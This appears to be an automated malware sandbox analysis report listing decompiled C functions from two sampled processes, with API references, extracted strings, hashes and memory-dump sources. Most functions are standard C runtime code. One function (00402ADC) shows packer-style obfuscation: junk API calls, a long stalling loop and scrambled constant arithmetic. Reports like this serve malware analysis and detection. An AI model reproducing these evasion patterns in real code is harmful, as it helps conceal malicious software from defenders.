API ID: Process$ActiveConsoleDebugSizeStringWorkingWrite
String ID:
API String ID: 4204620807-0
Opcode ID: 0a6034e446cd9f43c3f665b496e46f4f24d3037a1f746c4fdf4176757d5961b2
Instruction ID: ece515c153ed40cf5fb097a15ab51fb78e94f721d907a4b70b6bd4020438fc31
Opcode Fuzzy Hash: 0a6034e446cd9f43c3f665b496e46f4f24d3037a1f746c4fdf4176757d5961b2
Instruction Fuzzy Hash: 18F0AF721020387BD320B756AE4CCEB7F6CEF463A5B000136F609E25A0D6744942C6FC

Uniqueness

Uniqueness Score: -1.00%

Function 00408E90 Relevance: 6.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 90%

			E00408E90(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t13;
				void* _t25;
				intOrPtr _t27;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ebx;
				_push(0xc);
				_push(0x410018);
				E0040487C(__ebx, __edi, __esi);
				_t29 = E004063F0(__ebx, _t31);
				_t13 =  *0x411dcc; // 0xfffffffe
				if(( *(_t29 + 0x70) & _t13) == 0) {
					L6:
					E00406842(_t22, _t25, _t26, 0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t8 = _t29 + 0x6c; // 0x6c
					_t27 =  *0x411eb0; // 0x411dd8
					 *((intOrPtr*)(_t30 - 0x1c)) = E00408E52(_t8, _t25, _t27);
					 *(_t30 - 4) = 0xfffffffe;
					E00408EFA();
				} else {
					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E004063F0(_t22, _t33) + 0x6c));
					}
				}
				if(_t29 == 0) {
					E00403B50(0x20);
				}
				return E004048C1(_t29);
			}

0x00408e90
0x00408e90
0x00408e90
0x00408e90
0x00408e90
0x00408e92
0x00408e97
0x00408ea1
0x00408ea3
0x00408eab
0x00408ecf
0x00408ed1
0x00408ed7
0x00408edb
0x00408ede
0x00408ee9
0x00408eec
0x00408ef3
0x00408ead
0x00408ead
0x00408eb1
0x00000000
0x00408eb3
0x00408eb8
0x00408eb8
0x00408eb1
0x00408ebd
0x00408ec1
0x00408ec6
0x00408ece

APIs

__getptd.LIBCMT ref: 00408E9C

Part of subcall function 004063F0: __getptd_noexit.LIBCMT ref: 004063F3
Part of subcall function 004063F0: __amsg_exit.LIBCMT ref: 00406400

__getptd.LIBCMT ref: 00408EB3
__amsg_exit.LIBCMT ref: 00408EC1
__lock.LIBCMT ref: 00408ED1

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
Instruction ID: 7dfb229ca309a3576c6494551f69a8709b23ae4e697a609cd87e5ec77ce5a6c7
Opcode Fuzzy Hash: 8cfb4e927b11a63e541db51d14f2b96b8a76d30df1f9827180e7cdf74ed52db0
Instruction Fuzzy Hash: E1F090329107408AD720BB6AD502B4E73A0AB40729F11853FE985B72D3CF7CAA019BDD

Uniqueness

Uniqueness Score: -1.00%

Function 004044E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004044E9() {
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t10;
				void* _t12;
				intOrPtr _t15;
				intOrPtr* _t16;
				signed int _t19;
				signed int _t20;
				intOrPtr _t26;
				intOrPtr _t27;

				_t5 =  *0x42f4e0;
				_t26 = 0x14;
				if(_t5 != 0) {
					if(_t5 < _t26) {
						_t5 = _t26;
						goto L4;
					}
				} else {
					_t5 = 0x200;
					L4:
					 *0x42f4e0 = _t5;
				}
				_t6 = E0040810E(_t5, 4);
				 *0x42e4c4 = _t6;
				if(_t6 != 0) {
					L8:
					_t19 = 0;
					_t15 = 0x411220;
					while(1) {
						 *((intOrPtr*)(_t19 + _t6)) = _t15;
						_t15 = _t15 + 0x20;
						_t19 = _t19 + 4;
						if(_t15 >= 0x4114a0) {
							break;
						}
						_t6 =  *0x42e4c4;
					}
					_t27 = 0xfffffffe;
					_t20 = 0;
					_t16 = 0x411230;
					do {
						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x42e3c0 + (_t20 >> 5) * 4))));
						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
							 *_t16 = _t27;
						}
						_t16 = _t16 + 0x20;
						_t20 = _t20 + 1;
					} while (_t16 < 0x411290);
					return 0;
				} else {
					 *0x42f4e0 = _t26;
					_t6 = E0040810E(_t26, 4);
					 *0x42e4c4 = _t6;
					if(_t6 != 0) {
						goto L8;
					} else {
						_t12 = 0x1a;
						return _t12;
					}
				}
			}

0x004044e9
0x004044f1
0x004044f4
0x004044ff
0x00404501
0x00000000
0x00404501
0x004044f6
0x004044f6
0x00404503
0x00404503
0x00404503
0x0040450b
0x00404512
0x00404519
0x00404539
0x00404539
0x0040453b
0x00404547
0x00404547
0x0040454a
0x0040454d
0x00404556
0x00000000
0x00000000
0x00404542
0x00404542
0x0040455a
0x0040455b
0x0040455d
0x00404563
0x00404577
0x0040457d
0x00404587
0x00404587
0x00404589
0x0040458c
0x0040458d
0x00404599
0x0040451b
0x0040451e
0x00404524
0x0040452b
0x00404532
0x00000000
0x00404534
0x00404536
0x00404538
0x00404538
0x00404532

APIs

__calloc_crt.LIBCMT ref: 0040450B
__calloc_crt.LIBCMT ref: 00404524

Strings

B, xrefs: 0040453B

Memory Dump Source

Source File: 00000009.00000002.553508843.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.553475176.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553628306.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553681156.0000000000418000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553804679.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000009.00000002.553834742.0000000000430000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_vgfsabt.jbxd

Similarity

API ID: __calloc_crt
String ID: B
API String ID: 3494438863-3806887055
Opcode ID: cec946d9292b1583b33420cc846faf8f2b07d7b3b51fbce41faad93c074d4dda
Instruction ID: ec396d00c2cb3653196f90cd37ad9fe5819471fdf8d43a4571e337af32097bf8
Opcode Fuzzy Hash: cec946d9292b1583b33420cc846faf8f2b07d7b3b51fbce41faad93c074d4dda
Instruction Fuzzy Hash: C811E7F130412067E7249F1FBD406662295ABD47787A4057FFB15EB3E0D778D882464C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 1E3.exePID: 3536, Parent PID: 3324COMMON

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	15.1%
Signature Coverage:	0%
Total number of Nodes:	1609
Total number of Limit Nodes:	23

Executed Functions

Function 00402ADC Relevance: 65.3, APIs: 11, Strings: 26, Instructions: 514
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00402ADC(void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				intOrPtr _v236;
				intOrPtr _v240;
				intOrPtr _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				intOrPtr _v280;
				intOrPtr _v284;
				intOrPtr _v288;
				intOrPtr _v292;
				intOrPtr _v296;
				intOrPtr _v300;
				intOrPtr _v304;
				intOrPtr _v308;
				intOrPtr _v312;
				intOrPtr _v316;
				intOrPtr _v320;
				intOrPtr _v324;
				intOrPtr _v328;
				intOrPtr _v332;
				intOrPtr _v336;
				intOrPtr _v340;
				intOrPtr _v344;
				intOrPtr _v348;
				long _v352;
				char _v356;
				void* _t1147;
				void* _t1226;
				void* _t1236;

				_t1236 = __fp0;
				if( *0x479904 == 0x20) {
					WindowFromDC(0);
					FreeEnvironmentStringsA(0);
					GetNumberOfConsoleMouseButtons(0);
					ResetEvent(0);
					EndUpdateResourceW(0, 0);
					GetComputerNameW(0, 0);
					E00403954(_t1147, 0, 0);
					E00403954(_t1147, 0, 0);
					_pop(_t1147);
					_v352 = 0;
					_v356 = 0;
					E004026A0();
					st0 = _t1236;
				}
				_t1226 = 0;
				while(1) {
					SetCommMask(0, 0); // executed
					SetLastError(0);
					__imp__GetConsoleAliasW(0, 0, 0, 0);
					if(_t1226 < 0x2481de) {
						_v20 = 0x203525ba;
						_v180 = 0x29672311;
						_v280 = 0x16c17e2f;
						_v160 = 0x4b37d46c;
						_v336 = 0x71be5419;
						_v304 = 0x2a6f2367;
						_v64 = 0x11c0adcd;
						_v152 = 0x3ddf365e;
						_v28 = 0x14911e74;
						_v308 = 0x50ce19d3;
						_v68 = 0x46f869e8;
						_v340 = 0x73e340fc;
						_v80 = 0x1359616b;
						_v76 = 0x656bf717;
						_v348 = 0x4f4a2ff8;
						_v84 = 0x8d23614;
						_v188 = 0x5ed12ef4;
						_v200 = 0x76f0e45a;
						_v140 = 0x2b9e4787;
						_v268 = 0x6871870a;
						_v240 = 0x67b6becb;
						_v48 = 0x703cc4ef;
						_v264 = 0x3a9d68c1;
						_v248 = 0x5eea6a45;
						_v36 = 0x6999b15b;
						_v44 = 0x2c309c02;
						_v276 = 0x14ac6c8f;
						_v40 = 0x7eee8d2e;
						_v144 = 0x547f0d36;
						_v112 = 0x70d291f5;
						_v356 = 0x209b567d;
						_v92 = 0x16da1455;
						_v100 = 0x1ae444cc;
						_v316 = 0x41516c8a;
						_v284 = 0x75a895a4;
						_v196 = 0x15561db7;
						_v272 = 0x3730d9c8;
						_v344 = 0x30ddf634;
						_v136 = 0x7892e542;
						_v148 = 0x5f170584;
						_v156 = 0x33c4e1ea;
						_v208 = 0x592940f0;
						_v324 = 0x25410382;
						_v292 = 0x67c87b5b;
						_v52 = 0x724cb291;
						_v108 = 0x2af6ce75;
						_v204 = 0x5346c5e;
						_v236 = 0x68a67ef7;
						_v216 = 0x7b2ef7dc;
						_v56 = 0x74b593a5;
						_v312 = 0x442ae7f3;
						_v184 = 0x18dee23d;
						_v120 = 0x4a7db4c;
						_v244 = 0x5884e700;
						_v116 = 0x7e8f4c2b;
						_v212 = 0x1027ca35;
						_v60 = 0x6f79f0f4;
						_v224 = 0x32bf6067;
						_v32 = 0x3570696a;
						_v288 = 0x15c8667f;
						_v220 = 0x8717856;
						_v124 = 0x6fcd3c9f;
						_v168 = 0x1bef4f4e;
						_v164 = 0x7e858361;
						_v300 = 0x4e1e64a2;
						_v104 = 0x35510366;
						_v320 = 0xb4a6467;
						_v72 = 0x53bb5cdd;
						_v96 = 0x57bdb0e;
						_v24 = 0x70f6f7ee;
						_v232 = 0x3fc2330c;
						_v328 = 0xc54e702;
						_v176 = 0x7f8ffaab;
						_v252 = 0x74e8996d;
						_v260 = 0x7a2361af;
						_v352 = 0x76ab72d3;
						_v172 = 0x3e506ff;
						_v88 = 0x4b61cfc9;
						_v256 = 0x34de0ea9;
						_v128 = 0x6d4d3170;
						_v228 = 0x232f9bdf;
						_v296 = 0x7089e762;
						_v332 = 0x6a3cdcab;
						_v192 = 0x524caf93;
						_v132 = 0x8c70c07;
						_v20 = _v20 + 0x4d3d3510;
						_v20 = _v20 + 0x135e1da;
						_v20 = _v20 + 0x35180cbe;
						_v20 = _v20 + 0x696d0ef2;
						_v20 = _v20 - 0x4e4a5034;
						_v20 = _v20 + 0x1b72df8b;
						_v20 = _v20 + 0x2c22951d;
						_v180 = _v180 + 0x2bd64939;
						_v64 = _v64 - 0x6da53567;
						_v304 = _v304 - 0x699b0b87;
						_v304 = _v304 + 0x20323dd;
						_v180 = _v180 - 0x16e3b0b6;
						_v336 = _v336 + 0x379dca51;
						_v280 = _v280 - 0x47b51208;
						_v76 = _v76 + 0x492b8f25;
						_v340 = _v340 - 0x69e2e061;
						_v76 = _v76 - 0x12d5d61e;
						_v80 = _v80 + 0x5e29d58;
						_v180 = _v180 + 0xa80e177;
						_v160 = _v160 - 0xf70455;
						_v336 = _v336 - 0x219e6b92;
						_v28 = _v28 - 0x20485ec4;
						_v28 = _v28 + 0x69ace6c8;
						_v308 = _v308 + 0x5a216d35;
						_v180 = _v180 + 0x3f843f47;
						_v308 = _v308 - 0x95cc609;
						_v308 = _v308 + 0x7d3a90d6;
						_v308 = _v308 - 0x73f44647;
						_v152 = _v152 + 0x6a2057fb;
						_v28 = _v28 - 0x52161216;
						_v348 = _v348 + 0x781183f9;
						_v340 = _v340 - 0x3fe7a1ba;
						_v140 = _v140 + 0x364cdd66;
						_v152 = _v152 - 0x2da2fae0;
						_v80 = _v80 - 0x3089ddf6;
						_v340 = _v340 + 0x600f4bd8;
						_v64 = _v64 + 0x6d466040;
						_v336 = _v336 - 0x6da3abc8;
						_v308 = _v308 + 0x366d9f10;
						_v48 = _v48 - 0x1ef2a420;
						_v152 = _v152 - 0x766c1a9e;
						_v28 = _v28 - 0x579729e1;
						_v140 = _v140 - 0x7eab5274;
						_v340 = _v340 + 0x1de85669;
						_v20 = _v20 - 0xbcf4e6e;
						_v308 = _v308 + 0x3d316046;
						_v264 = _v264 - 0x3f906759;
						_v80 = _v80 - 0xeb78cd9;
						_v152 = _v152 + 0x3b85cf27;
						_v268 = _v268 + 0x6693ae15;
						_v76 = _v76 + 0x5f10712f;
						_v240 = _v240 - 0x777dd0d3;
						_v268 = _v268 - 0x607f0eba;
						_v276 = _v276 - 0x65495b43;
						_v140 = _v140 - 0x10ace82b;
						_v348 = _v348 + 0x6e02360d;
						_v248 = _v248 - 0x41f3300a;
						_v44 = _v44 - 0x747dc239;
						_v276 = _v276 - 0x43b4b4c;
						_v76 = _v76 + 0x729b4def;
						_v340 = _v340 - 0xa2bdbda;
						_v340 = _v340 + 0x6f8e2f6a;
						_v336 = _v336 - 0x36e72425;
						_v308 = _v308 + 0x785a2b54;
						_v44 = _v44 - 0x26d04c95;
						_v84 = _v84 + 0x49b7c039;
						_v100 = _v100 - 0x6d199031;
						_v308 = _v308 + 0x2643aac5;
						_v40 = _v40 + 0x6b8f9482;
						_v28 = _v28 - 0x8ae8a90;
						_v160 = _v160 - 0x41898451;
						_v112 = _v112 - 0x7fe90396;
						_v112 = _v112 - 0x8093c62;
						_v144 = _v144 + 0x23975e2e;
						_v356 = _v356 + 0x1589bd55;
						_v76 = _v76 + 0x39c11ed;
						_v84 = _v84 - 0x54345c52;
						_v36 = _v36 + 0x7460d598;
						_v264 = _v264 + 0x4d3daef6;
						_v160 = _v160 - 0x4ea53d47;
						_v64 = _v64 - 0x6dd2bf73;
						_v324 = _v324 - 0x139d206e;
						_v36 = _v36 + 0x7ae2f425;
						_v336 = _v336 - 0x1862274f;
						_v264 = _v264 - 0x491e7eb3;
						_v156 = _v156 - 0x2acc84e8;
						_v36 = _v36 + 0x6122182d;
						_v340 = _v340 - 0x3deb6422;
						_v28 = _v28 + 0x60ec9f16;
						_v236 = _v236 - 0x3d84af5c;
						_v44 = _v44 - 0x1c2c5424;
						_v52 = _v52 - 0x38f9b257;
						_v204 = _v204 + 0x70e625ba;
						_v76 = _v76 + 0x4a9ab101;
						_v28 = _v28 - 0x6ca4d981;
						_v280 = _v280 + 0x7fbf517a;
						_v184 = _v184 + 0x1c88656f;
						_v36 = _v36 + 0x7d47acbf;
						_v188 = _v188 - 0x4100354b;
						_v108 = _v108 - 0x50dbfa28;
						_v304 = _v304 + 0x3f6cf8f7;
						_v76 = _v76 + 0x77e468d6;
						_v280 = _v280 + 0x45366263;
						_v36 = _v36 + 0x3e5018aa;
						_v236 = _v236 + 0x76430e4a;
						_v204 = _v204 - 0x5e97967d;
						_v344 = _v344 - 0x156ad00d;
						_v196 = _v196 + 0x50a85af0;
						_v340 = _v340 + 0x14bc8a19;
						_v244 = _v244 + 0x64a01771;
						_v40 = _v40 - 0x74023300;
						_v156 = _v156 - 0x3b643513;
						_v100 = _v100 - 0x53ffed8f;
						_v144 = _v144 - 0x2e682f84;
						_v180 = _v180 + 0x475aac54;
						_v220 = _v220 - 0x47dc6a5b;
						_v220 = _v220 - 0x1c18d963;
						_v340 = _v340 - 0x394aef10;
						_v272 = _v272 + 0x4afb8733;
						_v284 = _v284 + 0x1158e7b7;
						_v184 = _v184 + 0x2a332265;
						_v264 = _v264 + 0x1e01fc46;
						_v176 = _v176 + 0x59cb4930;
						_v320 = _v320 - 0x3746ef35;
						_v304 = _v304 - 0x33901629;
						_v148 = _v148 + 0x200960fa;
						_v268 = _v268 + 0x270d63c2;
						_v328 = _v328 - 0x538ef25c;
						_v56 = _v56 - 0x1442058;
						_v176 = _v176 + 0x202d0e4e;
						_v48 = _v48 - 0x128ada4f;
						_v72 = _v72 - 0x1bbf669e;
						_v184 = _v184 - 0x16d9feb0;
						_v152 = _v152 - 0x551d7c0;
						_v284 = _v284 + 0x7f0531ec;
						_v152 = _v152 - 0x53344960;
						_v40 = _v40 + 0x17ab5b83;
						_v40 = _v40 - 0x4cb3ea82;
					}
					if(_t1226 > 0x23f110) {
						break;
					}
					_t1226 = _t1226 + 1;
					if(_t1226 < 0x152fade0) {
						continue;
					}
					break;
				}
				 *0x479904 =  *0x417cdc;
				 *0x479908 =  *0x416d3c;
				E0040297F(_t1147);
				return 0;
			}

0x00402adc
0x00402aed
0x00402af0
0x00402af7
0x00402afe
0x00402b05
0x00402b0d
0x00402b15
0x00402b1d
0x00402b24
0x00402b2a
0x00402b2b
0x00402b2f
0x00402b32
0x00402b37
0x00402b37
0x00402b39
0x00402b3b
0x00402b3d
0x00402b44
0x00402b4e
0x00402b5a
0x00402b60
0x00402b6b
0x00402b76
0x00402b7e
0x00402b89
0x00402b91
0x00402b99
0x00402ba4
0x00402baf
0x00402bba
0x00402bc2
0x00402bcd
0x00402bd5
0x00402be0
0x00402beb
0x00402bf3
0x00402bfe
0x00402c09
0x00402c14
0x00402c1f
0x00402c27
0x00402c2f
0x00402c3a
0x00402c42
0x00402c4a
0x00402c55
0x00402c60
0x00402c68
0x00402c73
0x00402c7e
0x00402c89
0x00402c91
0x00402c9c
0x00402ca7
0x00402caf
0x00402cb7
0x00402cc2
0x00402cca
0x00402cd2
0x00402cdd
0x00402ce8
0x00402cf3
0x00402cfe
0x00402d06
0x00402d0e
0x00402d19
0x00402d24
0x00402d2f
0x00402d3a
0x00402d45
0x00402d50
0x00402d58
0x00402d63
0x00402d6e
0x00402d76
0x00402d81
0x00402d8c
0x00402d97
0x00402da2
0x00402dad
0x00402db5
0x00402dc0
0x00402dcb
0x00402dd6
0x00402de1
0x00402de9
0x00402df4
0x00402dfc
0x00402e07
0x00402e12
0x00402e1d
0x00402e28
0x00402e30
0x00402e3b
0x00402e43
0x00402e4b
0x00402e53
0x00402e5e
0x00402e69
0x00402e71
0x00402e7c
0x00402e87
0x00402e8f
0x00402e97
0x00402ea2
0x00402ead
0x00402ecb
0x00402ed6
0x00402ee1
0x00402eec
0x00402ef7
0x00402f02
0x00402f0d
0x00402f45
0x00402f50
0x00402f85
0x00402fa0
0x00402fd1
0x00402fd9
0x00402ff4
0x00402fff
0x00403014
0x0040301f
0x0040302a
0x00403035
0x00403040
0x00403048
0x00403053
0x0040306b
0x00403073
0x0040307e
0x00403086
0x0040309b
0x004030a3
0x004030ae
0x004030b9
0x004030c1
0x004030c9
0x004030d4
0x004030f2
0x004030fd
0x00403118
0x00403123
0x00403138
0x00403160
0x0040316b
0x00403176
0x0040319b
0x004031a6
0x004031ae
0x004031b9
0x004031db
0x004031e3
0x004031ee
0x004031f9
0x00403201
0x00403219
0x00403221
0x00403229
0x0040323e
0x00403282
0x0040329d
0x004032b8
0x004032c3
0x004032cb
0x004032d6
0x004032de
0x00403306
0x0040330e
0x00403316
0x00403321
0x0040332c
0x00403337
0x00403372
0x00403390
0x0040339b
0x004033a6
0x004033c4
0x004033cf
0x004033da
0x004033e2
0x00403400
0x0040340b
0x00403416
0x0040341e
0x00403429
0x00403434
0x0040344f
0x00403467
0x0040346f
0x0040348a
0x00403495
0x004034a0
0x004034a8
0x004034c0
0x00403511
0x0040354f
0x0040357a
0x004035a5
0x004035b0
0x004035bb
0x004035c3
0x004035ce
0x004035d9
0x004035e4
0x00403615
0x0040361d
0x00403628
0x00403630
0x0040363b
0x0040366d
0x00403678
0x00403680
0x0040368b
0x00403693
0x0040369b
0x004036b9
0x004036c4
0x004036cf
0x004036ed
0x004036f8
0x00403716
0x00403721
0x00403729
0x00403744
0x0040374c
0x0040376a
0x0040377f
0x0040378a
0x00403792
0x0040379a
0x004037a5
0x004037ad
0x004037d5
0x0040380d
0x00403818
0x00403823
0x0040382e
0x00403839
0x00403877
0x004038c5
0x004038dd
0x004038e8
0x004038e8
0x004038f9
0x00000000
0x00000000
0x004038fb
0x00403902
0x00000000
0x00000000
0x00000000
0x00403902
0x0040390d
0x00403917
0x0040391c
0x0040392b

APIs

WindowFromDC.USER32(00000000), ref: 00402AF0
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00402AF7
GetNumberOfConsoleMouseButtons.KERNEL32(00000000), ref: 00402AFE
ResetEvent.KERNEL32(00000000), ref: 00402B05
EndUpdateResourceW.KERNEL32(00000000,00000000), ref: 00402B0D
GetComputerNameW.KERNEL32 ref: 00402B15
_calloc.LIBCMT ref: 00402B1D

Part of subcall function 00403954: __calloc_impl.LIBCMT ref: 00403969

_calloc.LIBCMT ref: 00402B24
SetCommMask.KERNELBASE(00000000,00000000), ref: 00402B3D
SetLastError.KERNEL32(00000000), ref: 00402B44
GetConsoleAliasW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00402B4E

Strings

<=Tl, xrefs: 00403504
IBu7, xrefs: 0040356D
@`Fm, xrefs: 00403118
R\4T, xrefs: 00403400
`I4S, xrefs: 004038C5
eXYh, xrefs: 00402F25
jip5, xrefs: 00402DA2
`Y7@, xrefs: 00402F32
C[Ie, xrefs: 00403229
K5, xrefs: 004035D9
e"3*, xrefs: 0040374C
B;, xrefs: 00402FBE
ciH, xrefs: 00403477
5F7, xrefs: 0040378A
g#o*, xrefs: 00402B91
<4X, xrefs: 00403352
cb6E, xrefs: 00403628
p1Mm, xrefs: 00402E71
4PJN, xrefs: 00402EEC
%$6, xrefs: 00403306
"d=, xrefs: 004034A0
#h-, xrefs: 00402F72
ua%, xrefs: 0040337D
T+Zx, xrefs: 0040330E
eW9$, xrefs: 00403249
Ej^, xrefs: 00402C42

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: Console_calloc$AliasButtonsCommComputerEnvironmentErrorEventFreeFromLastMaskMouseNameNumberResetResourceStringsUpdateWindow__calloc_impl
String ID: "d=$#h-$%$6$4PJN$5F7$<=Tl$<4X$@`Fm$B;$C[Ie$Ej^$IBu7$K5$R\4T$T+Zx$`I4S$`Y7@$cb6E$ciH$e"3*$eW9$$eXYh$g#o*$jip5$p1Mm$ua%
API String ID: 3970707773-1174297621
Opcode ID: c1450f12cbcde2ba815a9ae6640dce5531c23eee11ec049179237c7e2cdc89f9
Instruction ID: 366320939e209ee0b1a7947af6c80efbf811adb7fd4a1cf77077aecc4ceb2376
Opcode Fuzzy Hash: c1450f12cbcde2ba815a9ae6640dce5531c23eee11ec049179237c7e2cdc89f9
Instruction Fuzzy Hash: D662EAB9609380CBC2B48F6AC58978EF7E4BF99314F508D0CE5DA9A620C7709985CF57

Uniqueness

Uniqueness Score: -1.00%

Function 0040714F Relevance: 4.5, APIs: 3, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040714F() {
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t1;
				void* _t5;
				void* _t18;
				WCHAR* _t20;

				_t1 = GetEnvironmentStringsW();
				_t20 = _t1;
				if(_t20 != 0) {
					if( *_t20 != 0) {
						goto L3;
						do {
							do {
								L3:
								_t1 =  &(_t1[1]);
							} while ( *_t1 != 0);
							_t1 =  &(_t1[1]);
						} while ( *_t1 != 0);
					}
					_t13 = _t1 - _t20 + 2;
					_t5 = E004080C9(_t1 - _t20 + 2); // executed
					_t18 = _t5;
					if(_t18 != 0) {
						E0040A030(_t13, _t18, _t20, _t18, _t20, _t13);
					}
					FreeEnvironmentStringsW(_t20);
					return _t18;
				} else {
					return 0;
				}
			}

APIs

GetEnvironmentStringsW.KERNEL32(00000000,00403F3A), ref: 00407152
__malloc_crt.LIBCMT ref: 00407180
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0040718D

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553733662.0000000000418000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554251125.0000000000477000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.554282068.000000000047B000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_1E3.jbxd

Similarity

API ID: EnvironmentStrings$Free__malloc_crt
String ID:
API String ID: 237123855-0
Opcode ID: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
Instruction ID: 3864f1fbe5c903a96f437bc9bd3a71b249565b48777c964063066275c13dfad6
Opcode Fuzzy Hash: 8fabccca1e6171ddc240eda1d034c06755ba580f82cf259f9fe05248f73ea12e
Instruction Fuzzy Hash: 97F0E23B9191616ADA203B357C488771668DAC6329312443BF896E73C0F9385D8382AA

Uniqueness

Uniqueness Score: -1.00%

Function 00407400 Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00407400(intOrPtr _a4) {
				void* _t6;

				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
				 *0x4781d4 = _t6;
				if(_t6 != 0) {
					 *0x479930 = 1;
					return 1;
				} else {
					return _t6;
				}
			}

0x00407415
0x0040741b
0x00407422
0x00407429
0x0040742f
0x00407425
0x00407425
0x00407425

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 00407415

Memory Dump Source

Source File: 0000000A.00000002.553571616.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.553534581.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 0000000A.00000002.553680188.0000000000411000.00000004.00000001.01000000.00000008.sdmpDownload File
